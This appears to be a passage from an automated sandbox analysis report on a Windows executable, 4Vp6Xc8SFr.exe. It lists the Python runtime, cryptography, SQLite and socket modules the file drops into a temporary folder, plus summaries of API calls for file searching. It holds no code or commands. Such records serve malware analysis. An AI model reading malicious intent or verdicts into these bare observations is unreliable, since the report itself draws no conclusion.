Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_MD4.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\PublicKey\_x25519.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_pkcs1_decode.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_aes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_MD2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_ocb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_arc2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Math\_modexp.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_cast.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\libffi-7.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_ARC4.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_poly1305.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\PublicKey\_ed448.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_MD5.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_des.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\python310.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\PublicKey\_ed25519.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\ucrtbase.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\PublicKey\_ec_ws.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\_socket.pyd	Jump to dropped file

Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe

Code function: 0_2_00007FF7DA8D55B0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00007FF7DA8D55B0

Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_chacha20.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\PublicKey\_ed448.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_blowfish.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_MD4.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_des.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\PublicKey\_x25519.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_pkcs1_decode.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_MD2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_arc2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\PublicKey\_ed25519.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\PublicKey\_ec_ws.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Math\_modexp.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_cast.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_ARC4.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_poly1305.pyd	Jump to dropped file

Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe

API coverage: 5.5 %

Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 0_2_00007FF7DA8D7790 FindFirstFileExW,FindClose,	0_2_00007FF7DA8D7790
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 0_2_00007FF7DA8E6664 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	0_2_00007FF7DA8E6664
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 0_2_00007FF7DA8E6664 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	0_2_00007FF7DA8E6664
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 0_2_00007FF7DA8F0904 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF7DA8F0904
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FF7DA8E6664 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	1_2_00007FF7DA8E6664
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FF7DA8D7790 FindFirstFileExW,FindClose,	1_2_00007FF7DA8D7790
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FF7DA8F0904 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	1_2_00007FF7DA8F0904
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FF7DA8E6664 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	1_2_00007FF7DA8E6664
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD863229 _errno,malloc,_errno,memset,MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,free,_errno,FindFirstFileW,_errno,FindNextFileW,WideCharToMultiByte,	1_2_00007FFCFD863229

